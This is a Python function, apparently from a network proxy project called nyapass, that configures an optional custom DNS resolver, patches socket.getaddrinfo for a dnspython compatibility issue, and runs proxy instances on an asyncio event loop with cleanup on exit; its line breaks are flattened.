def nyapass_run_instances(config, *instances): detect_nt() setup_signal() if config.use_custom_dns_resolver: try: from dns.resolver import ( Cache, get_default_resolver, override_system_resolver, ) except ImportError: log.warning( "dnspython3 is not installed, " "can't switch to custom resolver" ) else: resolver = get_default_resolver() resolver.cache = Cache() if config.custom_nameservers: resolver.nameservers = list(config.custom_nameservers) override_system_resolver(resolver) import socket old_getaddrinfo = socket.getaddrinfo def fixed_gai( host, port, family=0, type=0, proto=0, flags=0, **kwargs ): # Workaround for different parameter name in dnspython # (issue 123) return old_getaddrinfo( host, port, family, type, proto, flags, **kwargs ) socket.getaddrinfo = fixed_gai loop = asyncio.get_event_loop() if config.threadpool_workers: from concurrent.futures import ThreadPoolExecutor loop.set_default_executor(ThreadPoolExecutor( max_workers=config.threadpool_workers, )) loop.run_until_complete(asyncio.gather( *[x.init() for x in instances] )) def _cleanup(disable_pending_task_warnings=False): # Close the server loop.run_until_complete(asyncio.gather( *[x.shutdown() for x in instances] )) loop.stop() if disable_pending_task_warnings: [t.result() for t in Task.all_tasks()] loop.close() try: loop.run_forever() except SystemExit: try: _cleanup(True) except: pass raise except KeyboardInterrupt: pass _cleanup()